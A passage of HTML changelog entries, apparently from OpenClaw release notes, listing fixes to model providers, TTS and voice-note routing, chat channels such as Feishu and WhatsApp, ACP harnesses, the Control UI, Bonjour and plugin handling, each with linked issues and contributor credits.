<li>Providers/Z.AI: map OpenClaw thinking controls to Z.AI's <code>thinking</code> payload and add opt-in preserved thinking replay via <code>params.preserveThinking</code>, so GLM 5.x can keep prior <code>reasoning_content</code> when requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183616844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58680" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58680/hovercard" href="https://github.com/openclaw/openclaw/issues/58680">#58680</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuanmingguo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuanmingguo">@xuanmingguo</a>.</li>
<li>Channels/status: keep read-only channel lists on manifest and package metadata by default, loading setup runtime only for explicit fallback callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: scope setup and web-provider metadata manifest reads to explicit plugin ids when callers already know the owning plugin set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: defer onboarding install-record index writes until the guarded config commit so setup failures cannot leave the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: resolve web provider ownership from the installed plugin index instead of broad manifest scans on secret, tool, and pricing paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Config/providers: accept <code>video</code> and <code>audio</code> in configured model <code>input</code> values and preserve them in provider catalog entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3961456155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/20721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/20721/hovercard" href="https://github.com/openclaw/openclaw/issues/20721">#20721</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>.</li>
<li>Models/auth: honor the parent <code>--agent</code> flag for auth write commands (<code>add</code>, <code>login</code>, <code>setup-token</code>, <code>paste-token</code>, and the GitHub Copilot shortcut) so OAuth/API-key/token results are written to the requested agent store instead of the default agent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329713315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71864/hovercard" href="https://github.com/openclaw/openclaw/issues/71864">#71864</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329952100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71933/hovercard" href="https://github.com/openclaw/openclaw/pull/71933">#71933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balric-seo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balric-seo">@balric-seo</a>.</li>
<li>TTS: strip model-emitted TTS directives from streamed block text before channel delivery, including directives split across adjacent blocks, while preserving the accumulated raw reply for final-mode synthesis. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038643518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38937/hovercard" href="https://github.com/openclaw/openclaw/issues/38937">#38937</a>.</li>
<li>TTS: keep explicit <code>provider=...</code> directive keys scoped to that provider and warn on unsupported keys instead of letting another speech provider consume overlapping keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198945704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60131/hovercard" href="https://github.com/openclaw/openclaw/issues/60131">#60131</a>.</li>
<li>TTS/Feishu: normalize final-mode streamed TTS-only audio before delivery so generated voice-note files use the same safe media path and native voice routing as normal final replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329908441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71920/hovercard" href="https://github.com/openclaw/openclaw/issues/71920">#71920</a>.</li>
<li>Feishu: transcribe inbound voice-note audio with the shared media audio path before agent dispatch and keep raw Feishu <code>file_key</code> payloads out of message text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268134631" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67120/hovercard" href="https://github.com/openclaw/openclaw/issues/67120">#67120</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211680654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61876" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61876/hovercard" href="https://github.com/openclaw/openclaw/issues/61876">#61876</a>.</li>
<li>Tasks: terminalize async Gateway agent task records from the Gateway run result while preserving aborted, failed, and cancelled outcomes instead of leaving completed runs stuck as active or lost. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329869944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71905/hovercard" href="https://github.com/openclaw/openclaw/pull/71905">#71905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>WhatsApp: let authorized group voice-note transcripts satisfy mention gating before reply dispatch, while keeping unmentioned transcripts in pending group history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069891043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44908/hovercard" href="https://github.com/openclaw/openclaw/issues/44908">#44908</a>.</li>
<li>Media understanding: carry channel voice-note preflight state into attachment selection so WhatsApp, Feishu, Telegram, and Discord do not transcribe the same inbound audio twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315503496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70580/hovercard" href="https://github.com/openclaw/openclaw/issues/70580">#70580</a>.</li>
<li>TTS/BlueBubbles: deliver compatible auto-TTS audio as iMessage voice memo bubbles instead of plain MP3/CAF file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3943170481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/16848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/16848/hovercard" href="https://github.com/openclaw/openclaw/issues/16848">#16848</a>.</li>
<li>TTS: resolve voice-note and voice-memo routing from channel plugin capabilities instead of speech-core-owned channel id lists.</li>
<li>ACP: send subagent and async-task completion wakes to external ACP harnesses as plain prompts instead of OpenClaw internal runtime-context envelopes, while keeping those envelopes out of ACP transcripts.</li>
<li>TTS/status: show configured TTS model, voice, and sanitized custom endpoint in <code>/status</code>, preserve OpenAI-compatible TTS instructions on custom endpoints, and retry empty Microsoft/Edge TTS output once. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076830177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46602/hovercard" href="https://github.com/openclaw/openclaw/issues/46602">#46602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078185482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47232" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47232/hovercard" href="https://github.com/openclaw/openclaw/pull/47232">#47232</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063664533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43936/hovercard" href="https://github.com/openclaw/openclaw/pull/43936">#43936</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leekuangtao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leekuangtao">@leekuangtao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Huntterxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Huntterxx">@Huntterxx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex993">@rex993</a>.</li>
<li>Agents/Gateway: steer agent-driven config edits and restarts through the owner-only <code>gateway</code> tool, document <code>config.schema.lookup</code> as the field-doc source, and warn against using <code>gateway stop &amp;&amp; gateway start</code> as a restart substitute on macOS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329939344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71929" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71929/hovercard" href="https://github.com/openclaw/openclaw/issues/71929">#71929</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygc3817922006-sketch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygc3817922006-sketch">@ygc3817922006-sketch</a>.</li>
<li>Media understanding/audio: inject a deterministic transcript placeholder for too-small voice notes so agents do not hallucinate transcription or provider failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087777845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48944/hovercard" href="https://github.com/openclaw/openclaw/issues/48944">#48944</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eulicesl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eulicesl">@eulicesl</a>.</li>
<li>Providers/vLLM: send Nemotron 3 chat-template kwargs when thinking is off and honor configured <code>params.chat_template_kwargs</code> for OpenAI-compatible completions, so vLLM/Nemotron replies stay visible instead of becoming thinking-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329813098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71891" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71891/hovercard" href="https://github.com/openclaw/openclaw/issues/71891">#71891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dennis-lynch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dennis-lynch">@dennis-lynch</a>.</li>
<li>Channels/replies: strip copied inbound metadata blocks from user-facing assistant replies and model replay history, so Discord/vLLM sessions do not leak <code>Conversation info</code> / <code>UNTRUSTED ... message body</code> envelopes after a model echoes them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329636801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71847/hovercard" href="https://github.com/openclaw/openclaw/issues/71847">#71847</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a>.</li>
<li>Subagents/memory: keep inter-session completion wakes out of memory and dreaming session exports, and strip internal runtime-context blocks from realtime Control UI chat events.</li>
<li>Agents/Claude: treat zero-token empty <code>stop</code> turns as failed provider output, retry once, repair replay, and allow configured model fallback instead of preserving them as successful silent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71880/hovercard" href="https://github.com/openclaw/openclaw/issues/71880">#71880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>Tasks: normalize task lifecycle timestamps at create, update, and restore time, and report retained lost tasks as audit warnings until their cleanup window expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329725948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71871/hovercard" href="https://github.com/openclaw/openclaw/pull/71871">#71871</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>Diagnostics/OTEL: treat normal early model stream cleanup as a completed model call instead of exporting a misleading <code>StreamAbandoned</code> error span. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/pairing: stop corrupt or unreadable device/node pairing stores from being treated as empty state, preserving <code>paired.json</code> for repair instead of overwriting approved pairings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329738661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71873" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71873/hovercard" href="https://github.com/openclaw/openclaw/issues/71873">#71873</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iret77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iret77">@iret77</a>.</li>
<li>ACP: keep <code>/acp</code> management commands, plus local <code>/status</code> and <code>/unfocus</code>, on the Gateway path inside ACP-bound threads so they are not consumed as ACP prompt text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259260856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66298/hovercard" href="https://github.com/openclaw/openclaw/issues/66298">#66298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>.</li>
<li>ACPX: stop probing ACP agents during normal Gateway startup; the embedded backend now registers without spawning Codex/ACP child processes unless <code>OPENCLAW_ACPX_RUNTIME_STARTUP_PROBE=1</code> is explicitly set.</li>
<li>CLI/image edit: accept <code>--size</code>, <code>--aspect-ratio</code>, and <code>--resolution</code> on <code>openclaw infer image edit</code> and report all supported edit flags from <code>capability inspect image.edit</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pinghuachiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pinghuachiu">@Pinghuachiu</a>.</li>
<li>ACP: wait for the configured runtime backend to become healthy before startup identity reconciliation, avoiding transient acpx warnings during Gateway boot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043233380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40566" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40566/hovercard" href="https://github.com/openclaw/openclaw/issues/40566">#40566</a>.</li>
<li>Channels/ACP bindings: time out configured binding readiness checks instead of letting Discord preflight hang forever when an ACP target never settles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289732408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68776/hovercard" href="https://github.com/openclaw/openclaw/issues/68776">#68776</a>.</li>
<li>Control UI: hide the chat loading skeleton during background history reloads when existing messages or active stream content are already visible, avoiding reload flashes on high-latency local gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329620242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71844/hovercard" href="https://github.com/openclaw/openclaw/issues/71844">#71844</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep locally optimistic chat messages visible when a history reload temporarily returns empty, avoiding lost first-turn messages on high-latency gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329761362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71878/hovercard" href="https://github.com/openclaw/openclaw/issues/71878">#71878</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep chat history limits based on visible messages after filtering heartbeat and control-only transcript rows, so recent hidden entries no longer make older visible replies disappear. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/images: scrub old <code>[media attached: ...]</code>, <code>[Image: source: ...]</code>, and <code>media://inbound/...</code> markers from pruned model replay context so stale media refs are not rehydrated as fresh prompt images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329723266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71868/hovercard" href="https://github.com/openclaw/openclaw/issues/71868">#71868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmeadlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmeadlock">@jmeadlock</a>.</li>
<li>Docker/Bonjour: disable Bonjour/mDNS advertising by default for bundled Compose gateways on bridge networking, while keeping host/macvlan opt-in with <code>OPENCLAW_DISABLE_BONJOUR=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71879/hovercard" href="https://github.com/openclaw/openclaw/issues/71879">#71879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gbballpack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gbballpack">@gbballpack</a>.</li>
<li>CLI/status: label the OpenClaw Serve/Funnel setting as <code>Tailscale exposure</code> and show daemon state separately when available, so <code>gateway.tailscale.mode: "off"</code> no longer reads like the Tailscale daemon is stopped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329371669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71790/hovercard" href="https://github.com/openclaw/openclaw/issues/71790">#71790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pesvobodak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pesvobodak">@pesvobodak</a>.</li>
<li>Plugins/Bonjour: stop ciao mDNS watchdog failures from looping forever when the advertiser stays stuck in <code>probing</code> or <code>announcing</code>; Bonjour now disables itself for the current Gateway process after repeated failed restarts while the Gateway keeps running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291316152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69011/hovercard" href="https://github.com/openclaw/openclaw/issues/69011">#69011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siddharthaagarwalofficial-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siddharthaagarwalofficial-ux">@siddharthaagarwalofficial-ux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spikefcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spikefcz">@spikefcz</a>.</li>
<li>Gateway/Fly.io: seed Control UI allowed origins from the actual runtime bind and port so CLI-driven non-loopback starts do not crash before config exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329508985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71823/hovercard" href="https://github.com/openclaw/openclaw/issues/71823">#71823</a>.</li>
<li>macOS/remote SSH: keep discovered gateway hosts in <code>gateway.remote.sshTarget</code> while pinning SSH transport URLs to the local loopback tunnel, so browser automation does not regress into blocked non-loopback <code>ws://</code> endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270922535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67336/hovercard" href="https://github.com/openclaw/openclaw/issues/67336">#67336</a>.</li>
<li>Gateway/proxy: bootstrap env proxy dispatching from direct Gateway startup so provider and plugin network requests honor <code>HTTPS_PROXY</code>/<code>HTTP_PROXY</code> before the first embedded agent attempt runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71833/hovercard" href="https://github.com/openclaw/openclaw/pull/71833">#71833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Plugins/runtime deps: verify clean npm installs actually place requested bundled runtime packages in the managed install root, reporting exact missing specs instead of a false successful repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Plugins/discovery: ignore stale <code>plugins.load.paths</code> aliases that point back at packaged bundled plugin directories and have doctor remove them, keeping bundled plugins on the runtime-deps staging path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Models/LM Studio: preserve <code>@iq*</code> quant suffixes in model refs and provider matching so <code>/model lmstudio/...@iq3_xxs</code> keeps the exact LM Studio variant. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327545635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71474/hovercard" href="https://github.com/openclaw/openclaw/issues/71474">#71474</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327608782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71486/hovercard" href="https://github.com/openclaw/openclaw/pull/71486">#71486</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XinwuC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XinwuC">@XinwuC</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Matrix/cron: preserve the live Matrix delivery target when creating implicit announce reminder jobs so mixed-case room IDs are not reconstructed from lowercased session keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329391998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71798/hovercard" href="https://github.com/openclaw/openclaw/issues/71798">#71798</a>.</li>
<li>Feishu: accept Schema 2.0 card action callbacks that report <code>context.open_chat_id</code> instead of legacy <code>context.chat_id</code>, so button callbacks no longer drop as malformed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328732574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71670/hovercard" href="https://github.com/openclaw/openclaw/issues/71670">#71670</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Feishu: keep synthetic card-action and bot-menu ids out of platform reply targets, using the real card callback message id when Feishu provides one and plain-sending otherwise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328744083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71673/hovercard" href="https://github.com/openclaw/openclaw/issues/71673">#71673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Plugins/QQ Bot: prefer an installed QQ Bot plugin that declares it replaces the bundled <code>qqbot</code> channel, preventing duplicate <code>qqbot_channel_api</code> and <code>qqbot_remind</code> tool registration noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223849801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63102/hovercard" href="https://github.com/openclaw/openclaw/issues/63102">#63102</a>.</li>
<li>Browser automation: keep stable tab ids and labels attached when Chromium replaces the raw target after form submissions or other action-triggered navigations, and return the replacement <code>targetId</code> from <code>/act</code> when the match is provable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075792997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46137/hovercard" href="https://github.com/openclaw/openclaw/issues/46137">#46137</a>.</li>
